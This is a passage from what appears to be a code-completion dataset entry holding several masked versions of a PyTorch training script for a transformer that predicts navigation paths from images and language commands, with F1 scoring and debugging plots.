axis=None)[-top_k:]\n top_k_inds = np.unravel_index(top_k_inds, shape=(512, 512))\n pred_path[top_k_inds] = 1.1\n pred_path[pred_path < 1.0] = 0\n pred_path[top_k_inds] = 1.0\n elif threshold is not None:\n pred_path[pred_path < threshold] = 0\n else:\n pred_path = pred_path\n pred_path = np.tile(pred_path, (1, 1, 3)).astype(float)\n pred_ax = ax[1, 1]\n pred_ax.imshow(pred_path)\n file_path = f'{out_path}.png'\n print(f'saving to {file_path}')\n plt.savefig(file_path)\n plt.close()\n\n def validate(self, batch_instance, epoch_num, batch_num, instance_num,\n top_k, threshold):\n self.encoder.eval()\n outputs = self.encoder(batch_instance)\n next_position = outputs['next_position']\n next_position = tiles_to_image(next_position, self.patch_size,\n output_type='per-patch', upsample=True)\n next_p, next_r, next_f1 = self.f1_metric.compute_f1(batch_instance[\n 
'path_state'].unsqueeze(-1), next_position)\n if epoch_num > self.generate_after_n:\n for i in range(outputs['next_position'].shape[0]):\n output_path = self.checkpoint_dir.joinpath(f'batch_{batch_num}'\n ).joinpath(f'instance_{i}')\n output_path.mkdir(parents=True, exist_ok=True)\n command = batch_instance['command'][i]\n command = [x for x in command if x != '<PAD>']\n command = ' '.join(command)\n image = batch_instance['input_image'][i]\n path_state = batch_instance['path_state'][i]\n pred_path = next_position[i]\n self.generate_debugging_image(image, path_state, pred_path,\n output_path, caption=command, top_k=top_k, threshold=\n threshold)\n return {'next_f1': next_f1}\n\n def compute_f1(self, true_pos, pred_pos):\n eps = 1e-08\n values, pred_pixels = torch.max(pred_pos, dim=1)\n gold_pixels = true_pos\n pred_pixels = pred_pixels.unsqueeze(1)\n pred_pixels = pred_pixels.detach().cpu().float()\n gold_pixels = gold_pixels.detach().cpu().float()\n total_pixels = sum(pred_pixels.shape)\n true_pos = torch.sum(pred_pixels * gold_pixels).item()\n true_neg = torch.sum((1 - pred_pixels) * (1 - gold_pixels)).item()\n false_pos = torch.sum(pred_pixels * (1 - gold_pixels)).item()\n false_neg = torch.sum((1 - pred_pixels) * gold_pixels).item()\n precision = true_pos / (true_pos + false_pos + eps)\n recall = true_pos / (true_pos + false_neg + eps)\n f1 = 2 * (precision * recall) / (precision + recall + eps)\n return precision, recall, f1\n\n\ndef main(args):\n device = 'cpu'\n if args.cuda is not None:\n free_gpu_id = get_free_gpu()\n if free_gpu_id > -1:\n device = f'cuda:{free_gpu_id}'\n device = torch.device(device)\n print(f'On device {device}')\n nlp = English()\n tokenizer = Tokenizer(nlp.vocab)\n dataset_reader = NavigationDatasetReader(dir=args.data_dir, out_path=\n args.out_path, path_width=args.path_width, read_limit=args.\n read_limit, batch_size=args.batch_size, max_len=args.max_len,\n tokenizer=tokenizer, shuffle=args.shuffle, overfit=args.overfit,\n is_bert='bert' in args.embedder)\n checkpoint_dir = pathlib.Path(args.checkpoint_dir)\n if not checkpoint_dir.exists():\n checkpoint_dir.mkdir()\n if not args.test:\n with open(dataset_reader.path_dict['train'].joinpath('vocab.json')\n ) as f1:\n train_vocab = json.load(f1)\n with open(checkpoint_dir.joinpath('vocab.json'), 'w') as f1:\n json.dump(list(train_vocab), f1)\n else:\n print(f'Reading vocab from {checkpoint_dir}')\n with open(checkpoint_dir.joinpath('vocab.json')) as f1:\n train_vocab = json.load(f1)\n print(f'got data')\n print(f'constructing model...')\n if args.embedder == 'random':\n embedder = RandomEmbedder(tokenizer, train_vocab, args.\n embedding_dim, trainable=True)\n elif args.embedder == 'glove':\n embedder = GloveEmbedder(tokenizer, train_vocab, args.\n embedding_file, args.embedding_dim, trainable=True)\n elif args.embedder.startswith('bert'):\n embedder = BERTEmbedder(model_name=args.embedder, max_seq_len=args.\n max_len)\n else:\n raise NotImplementedError(f'No embedder {args.embedder}')\n depth = 1\n encoder_cls = NavigationTransformerEncoder\n encoder_kwargs = dict(image_size=args.resolution, patch_size=args.\n patch_size, language_embedder=embedder, n_layers=args.n_layers,\n channels=args.channels, n_heads=args.n_heads, hidden_dim=args.\n hidden_dim, ff_dim=args.ff_dim, dropout=args.dropout, embed_dropout\n =args.embed_dropout, output_type=args.output_type,\n positional_encoding_type=args.pos_encoding_type, device=device,\n log_weights=args.test, locality_mask=args.locality_mask,\n 
locality_neighborhood=args.locality_neighborhood, init_scale=args.\n init_scale)\n encoder = encoder_cls(**encoder_kwargs)\n if args.cuda is not None:\n encoder = encoder.cuda(device)\n print(encoder)\n optimizer = torch.optim.Adam(encoder.parameters(), lr=args.learn_rate)\n scheduler = NoamLR(optimizer, model_size=args.hidden_dim, warmup_steps=\n args.warmup, factor=args.lr_factor)\n best_epoch = -1\n block_size = int(args.resolution * 4 / 64)\n if not args.test:\n if not args.resume:\n try:\n os.mkdir(args.checkpoint_dir)\n except FileExistsError:\n try:\n assert len(glob.glob(os.path.join(args.checkpoint_dir,\n '*.th'))) == 0\n except AssertionError:\n raise AssertionError(\n f'Output directory {args.checkpoint_dir} non-empty, will not overwrite!'\n )\n else:\n encoder = encoder.to('cpu')\n state_dict = torch.load(pathlib.Path(args.checkpoint_dir).\n joinpath('best.th'), map_location='cpu')\n encoder.load_state_dict(state_dict, strict=True)\n encoder = encoder.cuda(device)\n best_checkpoint_data = json.load(open(pathlib.Path(args.\n checkpoint_dir).joinpath('best_training_state.json')))\n print(f'best_checkpoint_data {best_checkpoint_data}')\n best_epoch = best_checkpoint_data['epoch']\n with open(pathlib.Path(args.checkpoint_dir).joinpath('config.yaml'),\n 'w') as f1:\n dump_args = copy.deepcopy(args)\n del dump_args.__dict__['cfg']\n del dump_args.__dict__['__cwd__']\n del dump_args.__dict__['__path__']\n to_dump = dump_args.__dict__\n yaml.safe_dump(to_dump, f1, encoding='utf-8', allow_unicode=True)\n else:\n print(f'loading model weights from {args.checkpoint_dir}')\n encoder = encoder.to('cpu')\n state_dict = torch.load(pathlib.Path(args.checkpoint_dir).joinpath(\n 'best.th'), map_location='cpu')\n encoder.load_state_dict(state_dict, strict=True)\n encoder = encoder.cuda(device)\n num_blocks = 1\n trainer = NavigationTransformerTrainer(dataset_reader=dataset_reader,\n encoder=encoder, optimizer=optimizer, scheduler=scheduler,\n num_epochs=args.num_epochs, num_blocks=num_blocks, device=device,\n checkpoint_dir=args.checkpoint_dir, checkpoint_every=args.\n checkpoint_every, validation_limit=args.validation_limit,\n num_models_to_keep=args.num_models_to_keep, generate_after_n=args.\n generate_after_n, score_type=args.score_type, depth=depth,\n resolution=args.resolution, output_type=args.output_type,\n patch_size=args.patch_size, block_size=block_size, best_epoch=\n best_epoch, seed=args.seed, zero_weight=args.zero_weight,\n debug_image_top_k=args.debug_image_top_k, debug_image_threshold=\n args.debug_image_threshold)\n if not args.test:\n trainer.train()\n else:\n print(f'evaluating')\n acc = trainer.evaluate()\n print(f'accuracy: {acc}')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass NavigationTransformerTrainer(TransformerTrainer):\n\n def __init__(self, dataset_reader: NavigationDatasetReader, encoder:\n TransformerEncoder, optimizer: torch.optim.Optimizer, scheduler:\n Scheduler, num_epochs: int, num_blocks: int, device: torch.device,\n checkpoint_dir: str, num_models_to_keep: int, generate_after_n: int,\n resolution: int=64, patch_size: int=8, block_size: int=4,\n batch_size: int=16, output_type: str='per-pixel', checkpoint_every:\n int=64, validation_limit: int=16, depth: int=7, score_type: str=\n 'acc', best_epoch: int=-1, seed: int=12, zero_weight: float=0.05,\n debug_image_top_k: int=None, debug_image_threshold: float=None):\n super(NavigationTransformerTrainer, self).__init__(train_data=[],\n val_data=[], encoder=encoder, optimizer=optimizer, scheduler=\n scheduler, num_epochs=num_epochs, num_blocks=num_blocks, device\n =device, checkpoint_dir=checkpoint_dir, num_models_to_keep=\n num_models_to_keep, generate_after_n=generate_after_n,\n score_type=score_type, patch_size=patch_size, block_size=\n block_size, output_type=output_type, resolution=resolution,\n depth=depth, best_epoch=best_epoch, seed=seed, zero_weight=\n zero_weight)\n self.f1_metric = F1Metric()\n self.dataset_reader = dataset_reader\n self.batch_size = batch_size\n self.checkpoint_every = checkpoint_every\n self.validation_limit = validation_limit\n if debug_image_top_k < 0:\n debug_image_top_k = None\n if debug_image_threshold < 0:\n debug_image_threshold = None\n self.debug_image_top_k = debug_image_top_k\n self.debug_image_threshold = debug_image_threshold\n\n def split_large_batch(self, batch):\n large_bsz = batch['path_state'].shape[0]\n small_batches = []\n for i in range(0, large_bsz, self.batch_size):\n small_batch = {}\n for k in batch.keys():\n small_batch[k] = batch[k][i:i + self.batch_size]\n small_batches.append(small_batch)\n return small_batches\n\n def validate_one_epoch(self, epoch, step, validation_limit):\n print(f'Validating epoch {epoch} step {step}...')\n total_prev_acc, total_next_acc = 0.0, 0.0\n total = 0\n self.encoder.eval()\n for b, dev_batch_instance in enumerate(self.dataset_reader.read(\n 'dev', validation_limit)):\n actual_batches = self.split_large_batch(dev_batch_instance)\n for small_batch in actual_batches:\n score_dict = self.validate(small_batch, epoch, b, 0)\n total_next_acc += score_dict['next_f1']\n total += 1\n mean_next_acc = total_next_acc / total\n return mean_next_acc\n\n def evaluate(self):\n total_acc = 0.0\n total = 0\n total_block_acc = 0.0\n self.encoder.eval()\n for b, dev_batch_instance in tqdm(enumerate(self.dataset_reader.\n read('dev', self.validation_limit))):\n actual_batches = self.split_large_batch(dev_batch_instance)\n for small_batch in actual_batches:\n score_dict = self.validate(small_batch, 10, b, 0, self.\n debug_image_top_k, self.debug_image_threshold)\n total_acc += score_dict['next_f1']\n total += 1\n mean_acc = total_acc / total\n print(f'Test-time pixel acc {mean_acc * 100}')\n return mean_acc\n\n def train_and_validate_one_epoch(self, epoch):\n print(f'Training epoch {epoch}...')\n self.encoder.train()\n skipped = 0\n step = 0\n for b, batch_instance in enumerate(self.dataset_reader.read('train')):\n actual_batches = self.split_large_batch(batch_instance)\n for sb, small_batch in enumerate(actual_batches):\n is_best = False\n self.optimizer.zero_grad()\n outputs = self.encoder(small_batch)\n if outputs is None:\n skipped += 1\n continue\n loss = self.compute_patch_loss(small_batch, outputs, 
self.\n next_to_prev_weight)\n loss.backward()\n self.optimizer.step()\n it = (epoch + 1) * (step + 1)\n self.scheduler.step_batch(it)\n if (step + 1) % self.checkpoint_every == 0:\n step_acc = self.validate_one_epoch(epoch, step, self.\n validation_limit)\n print(\n f'Epoch {epoch} step {step} has next pixel F1 {step_acc * 100:.2f}'\n )\n if step_acc > self.best_score:\n is_best = True\n self.best_score = step_acc\n self.save_model(f'{epoch}_{step}', is_best)\n step += 1\n print(f'skipped {skipped} examples')\n epoch_acc = self.validate_one_epoch(epoch, step, 10 * self.\n validation_limit)\n print(f'Epoch {epoch} has next pixel F1 {epoch_acc * 100:.2f}')\n if self.score_type == 'acc':\n return epoch_acc / 2, -1.0\n else:\n raise AssertionError(f'invalid score type {self.score_type}')\n\n def compute_patch_loss(self, inputs, outputs, next_to_prev_weight=[1.0,\n 1.0]):\n \"\"\"\n compute per-patch for each patch \n \"\"\"\n bsz, w, h, __ = inputs['input_image'].shape\n pred_next_image = outputs['next_position']\n path_state = inputs['path_state'].reshape(bsz, 1, w, h).float()\n true_next_image = image_to_tiles(path_state, self.patch_size)\n next_sum_image = torch.sum(true_next_image, dim=2, keepdim=True)\n next_patches = torch.zeros_like(next_sum_image)\n next_patches[next_sum_image != 0] = 1\n pred_next_image = pred_next_image.squeeze(-1)\n next_patches = next_patches.squeeze(-1).to(self.device).long()\n pred_next_image = rearrange(pred_next_image, 'b n c -> b c n')\n next_pixel_loss = self.weighted_xent_loss_fxn(pred_next_image,\n next_patches)\n total_loss = next_pixel_loss\n print(f'loss {total_loss.item()}')\n return total_loss\n\n def generate_debugging_image(self, true_img, path_state, pred_path,\n out_path, caption=None, top_k=None, threshold=None):\n caption = self.wrap_caption(caption)\n fig, ax = plt.subplots(2, 2, figsize=(16, 16))\n text_ax = ax[0, 1]\n text_ax.axis([0, 1, 0, 1])\n text_ax.text(0.2, 0.02, caption, fontsize=12)\n text_ax.axis('off')\n props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)\n text_ax.text(0.05, 0.95, caption, wrap=True, fontsize=14,\n verticalalignment='top', bbox=props)\n img_ax = ax[1, 0]\n true_img = true_img.detach().cpu().numpy().astype(float)[:, :, 0:3]\n img_ax.imshow(true_img)\n true_path = path_state.detach().numpy()\n true_path = np.tile(true_path.reshape(512, 512, 1), (1, 1, 3)).astype(\n float)\n true_ax = ax[0, 0]\n true_ax.imshow(true_path)\n pred_path = torch.softmax(pred_path, dim=0)\n pred_path = pred_path[1, :, :]\n pred_path = pred_path.cpu().detach().numpy().reshape(512, 512, 1)\n if top_k is not None:\n top_k_inds = np.argpartition(pred_path, -top_k, axis=None)[-top_k:]\n top_k_inds = np.unravel_index(top_k_inds, shape=(512, 512))\n pred_path[top_k_inds] = 1.1\n pred_path[pred_path < 1.0] = 0\n pred_path[top_k_inds] = 1.0\n elif threshold is not None:\n pred_path[pred_path < threshold] = 0\n else:\n pred_path = pred_path\n pred_path = np.tile(pred_path, (1, 1, 3)).astype(float)\n pred_ax = ax[1, 1]\n pred_ax.imshow(pred_path)\n file_path = f'{out_path}.png'\n print(f'saving to {file_path}')\n plt.savefig(file_path)\n plt.close()\n\n def validate(self, batch_instance, epoch_num, batch_num, instance_num,\n top_k, threshold):\n self.encoder.eval()\n outputs = self.encoder(batch_instance)\n next_position = outputs['next_position']\n next_position = tiles_to_image(next_position, self.patch_size,\n output_type='per-patch', upsample=True)\n next_p, next_r, next_f1 = self.f1_metric.compute_f1(batch_instance[\n 
'path_state'].unsqueeze(-1), next_position)\n if epoch_num > self.generate_after_n:\n for i in range(outputs['next_position'].shape[0]):\n output_path = self.checkpoint_dir.joinpath(f'batch_{batch_num}'\n ).joinpath(f'instance_{i}')\n output_path.mkdir(parents=True, exist_ok=True)\n command = batch_instance['command'][i]\n command = [x for x in command if x != '<PAD>']\n command = ' '.join(command)\n image = batch_instance['input_image'][i]\n path_state = batch_instance['path_state'][i]\n pred_path = next_position[i]\n self.generate_debugging_image(image, path_state, pred_path,\n output_path, caption=command, top_k=top_k, threshold=\n threshold)\n return {'next_f1': next_f1}\n\n def compute_f1(self, true_pos, pred_pos):\n eps = 1e-08\n values, pred_pixels = torch.max(pred_pos, dim=1)\n gold_pixels = true_pos\n pred_pixels = pred_pixels.unsqueeze(1)\n pred_pixels = pred_pixels.detach().cpu().float()\n gold_pixels = gold_pixels.detach().cpu().float()\n total_pixels = sum(pred_pixels.shape)\n true_pos = torch.sum(pred_pixels * gold_pixels).item()\n true_neg = torch.sum((1 - pred_pixels) * (1 - gold_pixels)).item()\n false_pos = torch.sum(pred_pixels * (1 - gold_pixels)).item()\n false_neg = torch.sum((1 - pred_pixels) * gold_pixels).item()\n precision = true_pos / (true_pos + false_pos + eps)\n recall = true_pos / (true_pos + false_neg + eps)\n f1 = 2 * (precision * recall) / (precision + recall + eps)\n return precision, recall, f1\n\n\ndef main(args):\n device = 'cpu'\n if args.cuda is not None:\n free_gpu_id = get_free_gpu()\n if free_gpu_id > -1:\n device = f'cuda:{free_gpu_id}'\n device = torch.device(device)\n print(f'On device {device}')\n nlp = English()\n tokenizer = Tokenizer(nlp.vocab)\n dataset_reader = NavigationDatasetReader(dir=args.data_dir, out_path=\n args.out_path, path_width=args.path_width, read_limit=args.\n read_limit, batch_size=args.batch_size, max_len=args.max_len,\n tokenizer=tokenizer, shuffle=args.shuffle, overfit=args.overfit,\n is_bert='bert' in args.embedder)\n checkpoint_dir = pathlib.Path(args.checkpoint_dir)\n if not checkpoint_dir.exists():\n checkpoint_dir.mkdir()\n if not args.test:\n with open(dataset_reader.path_dict['train'].joinpath('vocab.json')\n ) as f1:\n train_vocab = json.load(f1)\n with open(checkpoint_dir.joinpath('vocab.json'), 'w') as f1:\n json.dump(list(train_vocab), f1)\n else:\n print(f'Reading vocab from {checkpoint_dir}')\n with open(checkpoint_dir.joinpath('vocab.json')) as f1:\n train_vocab = json.load(f1)\n print(f'got data')\n print(f'constructing model...')\n if args.embedder == 'random':\n embedder = RandomEmbedder(tokenizer, train_vocab, args.\n embedding_dim, trainable=True)\n elif args.embedder == 'glove':\n embedder = GloveEmbedder(tokenizer, train_vocab, args.\n embedding_file, args.embedding_dim, trainable=True)\n elif args.embedder.startswith('bert'):\n embedder = BERTEmbedder(model_name=args.embedder, max_seq_len=args.\n max_len)\n else:\n raise NotImplementedError(f'No embedder {args.embedder}')\n depth = 1\n encoder_cls = NavigationTransformerEncoder\n encoder_kwargs = dict(image_size=args.resolution, patch_size=args.\n patch_size, language_embedder=embedder, n_layers=args.n_layers,\n channels=args.channels, n_heads=args.n_heads, hidden_dim=args.\n hidden_dim, ff_dim=args.ff_dim, dropout=args.dropout, embed_dropout\n =args.embed_dropout, output_type=args.output_type,\n positional_encoding_type=args.pos_encoding_type, device=device,\n log_weights=args.test, locality_mask=args.locality_mask,\n 
locality_neighborhood=args.locality_neighborhood, init_scale=args.\n init_scale)\n encoder = encoder_cls(**encoder_kwargs)\n if args.cuda is not None:\n encoder = encoder.cuda(device)\n print(encoder)\n optimizer = torch.optim.Adam(encoder.parameters(), lr=args.learn_rate)\n scheduler = NoamLR(optimizer, model_size=args.hidden_dim, warmup_steps=\n args.warmup, factor=args.lr_factor)\n best_epoch = -1\n block_size = int(args.resolution * 4 / 64)\n if not args.test:\n if not args.resume:\n try:\n os.mkdir(args.checkpoint_dir)\n except FileExistsError:\n try:\n assert len(glob.glob(os.path.join(args.checkpoint_dir,\n '*.th'))) == 0\n except AssertionError:\n raise AssertionError(\n f'Output directory {args.checkpoint_dir} non-empty, will not overwrite!'\n )\n else:\n encoder = encoder.to('cpu')\n state_dict = torch.load(pathlib.Path(args.checkpoint_dir).\n joinpath('best.th'), map_location='cpu')\n encoder.load_state_dict(state_dict, strict=True)\n encoder = encoder.cuda(device)\n best_checkpoint_data = json.load(open(pathlib.Path(args.\n checkpoint_dir).joinpath('best_training_state.json')))\n print(f'best_checkpoint_data {best_checkpoint_data}')\n best_epoch = best_checkpoint_data['epoch']\n with open(pathlib.Path(args.checkpoint_dir).joinpath('config.yaml'),\n 'w') as f1:\n dump_args = copy.deepcopy(args)\n del dump_args.__dict__['cfg']\n del dump_args.__dict__['__cwd__']\n del dump_args.__dict__['__path__']\n to_dump = dump_args.__dict__\n yaml.safe_dump(to_dump, f1, encoding='utf-8', allow_unicode=True)\n else:\n print(f'loading model weights from {args.checkpoint_dir}')\n encoder = encoder.to('cpu')\n state_dict = torch.load(pathlib.Path(args.checkpoint_dir).joinpath(\n 'best.th'), map_location='cpu')\n encoder.load_state_dict(state_dict, strict=True)\n encoder = encoder.cuda(device)\n num_blocks = 1\n trainer = NavigationTransformerTrainer(dataset_reader=dataset_reader,\n encoder=encoder, optimizer=optimizer, scheduler=scheduler,\n num_epochs=args.num_epochs, num_blocks=num_blocks, device=device,\n checkpoint_dir=args.checkpoint_dir, checkpoint_every=args.\n checkpoint_every, validation_limit=args.validation_limit,\n num_models_to_keep=args.num_models_to_keep, generate_after_n=args.\n generate_after_n, score_type=args.score_type, depth=depth,\n resolution=args.resolution, output_type=args.output_type,\n patch_size=args.patch_size, block_size=block_size, best_epoch=\n best_epoch, seed=args.seed, zero_weight=args.zero_weight,\n debug_image_top_k=args.debug_image_top_k, debug_image_threshold=\n args.debug_image_threshold)\n if not args.test:\n trainer.train()\n else:\n print(f'evaluating')\n acc = trainer.evaluate()\n print(f'accuracy: {acc}')\n\n\nif __name__ == '__main__':\n np.random.seed(12)\n torch.manual_seed(12)\n parser = configure_parser()\n args = parser.parse_args()\n main(args)\n",
"step-4": "<mask token>\nlogger = logging.getLogger(__name__)\n\n\nclass NavigationTransformerTrainer(TransformerTrainer):\n\n def __init__(self, dataset_reader: NavigationDatasetReader, encoder:\n TransformerEncoder, optimizer: torch.optim.Optimizer, scheduler:\n Scheduler, num_epochs: int, num_blocks: int, device: torch.device,\n checkpoint_dir: str, num_models_to_keep: int, generate_after_n: int,\n resolution: int=64, patch_size: int=8, block_size: int=4,\n batch_size: int=16, output_type: str='per-pixel', checkpoint_every:\n int=64, validation_limit: int=16, depth: int=7, score_type: str=\n 'acc', best_epoch: int=-1, seed: int=12, zero_weight: float=0.05,\n debug_image_top_k: int=None, debug_image_threshold: float=None):\n super(NavigationTransformerTrainer, self).__init__(train_data=[],\n val_data=[], encoder=encoder, optimizer=optimizer, scheduler=\n scheduler, num_epochs=num_epochs, num_blocks=num_blocks, device\n =device, checkpoint_dir=checkpoint_dir, num_models_to_keep=\n num_models_to_keep, generate_after_n=generate_after_n,\n score_type=score_type, patch_size=patch_size, block_size=\n block_size, output_type=output_type, resolution=resolution,\n depth=depth, best_epoch=best_epoch, seed=seed, zero_weight=\n zero_weight)\n self.f1_metric = F1Metric()\n self.dataset_reader = dataset_reader\n self.batch_size = batch_size\n self.checkpoint_every = checkpoint_every\n self.validation_limit = validation_limit\n if debug_image_top_k < 0:\n debug_image_top_k = None\n if debug_image_threshold < 0:\n debug_image_threshold = None\n self.debug_image_top_k = debug_image_top_k\n self.debug_image_threshold = debug_image_threshold\n\n def split_large_batch(self, batch):\n large_bsz = batch['path_state'].shape[0]\n small_batches = []\n for i in range(0, large_bsz, self.batch_size):\n small_batch = {}\n for k in batch.keys():\n small_batch[k] = batch[k][i:i + self.batch_size]\n small_batches.append(small_batch)\n return small_batches\n\n def validate_one_epoch(self, epoch, step, validation_limit):\n print(f'Validating epoch {epoch} step {step}...')\n total_prev_acc, total_next_acc = 0.0, 0.0\n total = 0\n self.encoder.eval()\n for b, dev_batch_instance in enumerate(self.dataset_reader.read(\n 'dev', validation_limit)):\n actual_batches = self.split_large_batch(dev_batch_instance)\n for small_batch in actual_batches:\n score_dict = self.validate(small_batch, epoch, b, 0)\n total_next_acc += score_dict['next_f1']\n total += 1\n mean_next_acc = total_next_acc / total\n return mean_next_acc\n\n def evaluate(self):\n total_acc = 0.0\n total = 0\n total_block_acc = 0.0\n self.encoder.eval()\n for b, dev_batch_instance in tqdm(enumerate(self.dataset_reader.\n read('dev', self.validation_limit))):\n actual_batches = self.split_large_batch(dev_batch_instance)\n for small_batch in actual_batches:\n score_dict = self.validate(small_batch, 10, b, 0, self.\n debug_image_top_k, self.debug_image_threshold)\n total_acc += score_dict['next_f1']\n total += 1\n mean_acc = total_acc / total\n print(f'Test-time pixel acc {mean_acc * 100}')\n return mean_acc\n\n def train_and_validate_one_epoch(self, epoch):\n print(f'Training epoch {epoch}...')\n self.encoder.train()\n skipped = 0\n step = 0\n for b, batch_instance in enumerate(self.dataset_reader.read('train')):\n actual_batches = self.split_large_batch(batch_instance)\n for sb, small_batch in enumerate(actual_batches):\n is_best = False\n self.optimizer.zero_grad()\n outputs = self.encoder(small_batch)\n if outputs is None:\n skipped += 1\n continue\n loss = 
self.compute_patch_loss(small_batch, outputs, self.\n next_to_prev_weight)\n loss.backward()\n self.optimizer.step()\n it = (epoch + 1) * (step + 1)\n self.scheduler.step_batch(it)\n if (step + 1) % self.checkpoint_every == 0:\n step_acc = self.validate_one_epoch(epoch, step, self.\n validation_limit)\n print(\n f'Epoch {epoch} step {step} has next pixel F1 {step_acc * 100:.2f}'\n )\n if step_acc > self.best_score:\n is_best = True\n self.best_score = step_acc\n self.save_model(f'{epoch}_{step}', is_best)\n step += 1\n print(f'skipped {skipped} examples')\n epoch_acc = self.validate_one_epoch(epoch, step, 10 * self.\n validation_limit)\n print(f'Epoch {epoch} has next pixel F1 {epoch_acc * 100:.2f}')\n if self.score_type == 'acc':\n return epoch_acc / 2, -1.0\n else:\n raise AssertionError(f'invalid score type {self.score_type}')\n\n def compute_patch_loss(self, inputs, outputs, next_to_prev_weight=[1.0,\n 1.0]):\n \"\"\"\n compute per-patch for each patch \n \"\"\"\n bsz, w, h, __ = inputs['input_image'].shape\n pred_next_image = outputs['next_position']\n path_state = inputs['path_state'].reshape(bsz, 1, w, h).float()\n true_next_image = image_to_tiles(path_state, self.patch_size)\n next_sum_image = torch.sum(true_next_image, dim=2, keepdim=True)\n next_patches = torch.zeros_like(next_sum_image)\n next_patches[next_sum_image != 0] = 1\n pred_next_image = pred_next_image.squeeze(-1)\n next_patches = next_patches.squeeze(-1).to(self.device).long()\n pred_next_image = rearrange(pred_next_image, 'b n c -> b c n')\n next_pixel_loss = self.weighted_xent_loss_fxn(pred_next_image,\n next_patches)\n total_loss = next_pixel_loss\n print(f'loss {total_loss.item()}')\n return total_loss\n\n def generate_debugging_image(self, true_img, path_state, pred_path,\n out_path, caption=None, top_k=None, threshold=None):\n caption = self.wrap_caption(caption)\n fig, ax = plt.subplots(2, 2, figsize=(16, 16))\n text_ax = ax[0, 1]\n text_ax.axis([0, 1, 0, 1])\n text_ax.text(0.2, 0.02, caption, fontsize=12)\n text_ax.axis('off')\n props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)\n text_ax.text(0.05, 0.95, caption, wrap=True, fontsize=14,\n verticalalignment='top', bbox=props)\n img_ax = ax[1, 0]\n true_img = true_img.detach().cpu().numpy().astype(float)[:, :, 0:3]\n img_ax.imshow(true_img)\n true_path = path_state.detach().numpy()\n true_path = np.tile(true_path.reshape(512, 512, 1), (1, 1, 3)).astype(\n float)\n true_ax = ax[0, 0]\n true_ax.imshow(true_path)\n pred_path = torch.softmax(pred_path, dim=0)\n pred_path = pred_path[1, :, :]\n pred_path = pred_path.cpu().detach().numpy().reshape(512, 512, 1)\n if top_k is not None:\n top_k_inds = np.argpartition(pred_path, -top_k, axis=None)[-top_k:]\n top_k_inds = np.unravel_index(top_k_inds, shape=(512, 512))\n pred_path[top_k_inds] = 1.1\n pred_path[pred_path < 1.0] = 0\n pred_path[top_k_inds] = 1.0\n elif threshold is not None:\n pred_path[pred_path < threshold] = 0\n else:\n pred_path = pred_path\n pred_path = np.tile(pred_path, (1, 1, 3)).astype(float)\n pred_ax = ax[1, 1]\n pred_ax.imshow(pred_path)\n file_path = f'{out_path}.png'\n print(f'saving to {file_path}')\n plt.savefig(file_path)\n plt.close()\n\n def validate(self, batch_instance, epoch_num, batch_num, instance_num,\n top_k, threshold):\n self.encoder.eval()\n outputs = self.encoder(batch_instance)\n next_position = outputs['next_position']\n next_position = tiles_to_image(next_position, self.patch_size,\n output_type='per-patch', upsample=True)\n next_p, next_r, next_f1 = 
self.f1_metric.compute_f1(batch_instance[\n 'path_state'].unsqueeze(-1), next_position)\n if epoch_num > self.generate_after_n:\n for i in range(outputs['next_position'].shape[0]):\n output_path = self.checkpoint_dir.joinpath(f'batch_{batch_num}'\n ).joinpath(f'instance_{i}')\n output_path.mkdir(parents=True, exist_ok=True)\n command = batch_instance['command'][i]\n command = [x for x in command if x != '<PAD>']\n command = ' '.join(command)\n image = batch_instance['input_image'][i]\n path_state = batch_instance['path_state'][i]\n pred_path = next_position[i]\n self.generate_debugging_image(image, path_state, pred_path,\n output_path, caption=command, top_k=top_k, threshold=\n threshold)\n return {'next_f1': next_f1}\n\n def compute_f1(self, true_pos, pred_pos):\n eps = 1e-08\n values, pred_pixels = torch.max(pred_pos, dim=1)\n gold_pixels = true_pos\n pred_pixels = pred_pixels.unsqueeze(1)\n pred_pixels = pred_pixels.detach().cpu().float()\n gold_pixels = gold_pixels.detach().cpu().float()\n total_pixels = sum(pred_pixels.shape)\n true_pos = torch.sum(pred_pixels * gold_pixels).item()\n true_neg = torch.sum((1 - pred_pixels) * (1 - gold_pixels)).item()\n false_pos = torch.sum(pred_pixels * (1 - gold_pixels)).item()\n false_neg = torch.sum((1 - pred_pixels) * gold_pixels).item()\n precision = true_pos / (true_pos + false_pos + eps)\n recall = true_pos / (true_pos + false_neg + eps)\n f1 = 2 * (precision * recall) / (precision + recall + eps)\n return precision, recall, f1\n\n\ndef main(args):\n device = 'cpu'\n if args.cuda is not None:\n free_gpu_id = get_free_gpu()\n if free_gpu_id > -1:\n device = f'cuda:{free_gpu_id}'\n device = torch.device(device)\n print(f'On device {device}')\n nlp = English()\n tokenizer = Tokenizer(nlp.vocab)\n dataset_reader = NavigationDatasetReader(dir=args.data_dir, out_path=\n args.out_path, path_width=args.path_width, read_limit=args.\n read_limit, batch_size=args.batch_size, max_len=args.max_len,\n tokenizer=tokenizer, shuffle=args.shuffle, overfit=args.overfit,\n is_bert='bert' in args.embedder)\n checkpoint_dir = pathlib.Path(args.checkpoint_dir)\n if not checkpoint_dir.exists():\n checkpoint_dir.mkdir()\n if not args.test:\n with open(dataset_reader.path_dict['train'].joinpath('vocab.json')\n ) as f1:\n train_vocab = json.load(f1)\n with open(checkpoint_dir.joinpath('vocab.json'), 'w') as f1:\n json.dump(list(train_vocab), f1)\n else:\n print(f'Reading vocab from {checkpoint_dir}')\n with open(checkpoint_dir.joinpath('vocab.json')) as f1:\n train_vocab = json.load(f1)\n print(f'got data')\n print(f'constructing model...')\n if args.embedder == 'random':\n embedder = RandomEmbedder(tokenizer, train_vocab, args.\n embedding_dim, trainable=True)\n elif args.embedder == 'glove':\n embedder = GloveEmbedder(tokenizer, train_vocab, args.\n embedding_file, args.embedding_dim, trainable=True)\n elif args.embedder.startswith('bert'):\n embedder = BERTEmbedder(model_name=args.embedder, max_seq_len=args.\n max_len)\n else:\n raise NotImplementedError(f'No embedder {args.embedder}')\n depth = 1\n encoder_cls = NavigationTransformerEncoder\n encoder_kwargs = dict(image_size=args.resolution, patch_size=args.\n patch_size, language_embedder=embedder, n_layers=args.n_layers,\n channels=args.channels, n_heads=args.n_heads, hidden_dim=args.\n hidden_dim, ff_dim=args.ff_dim, dropout=args.dropout, embed_dropout\n =args.embed_dropout, output_type=args.output_type,\n positional_encoding_type=args.pos_encoding_type, device=device,\n log_weights=args.test, 
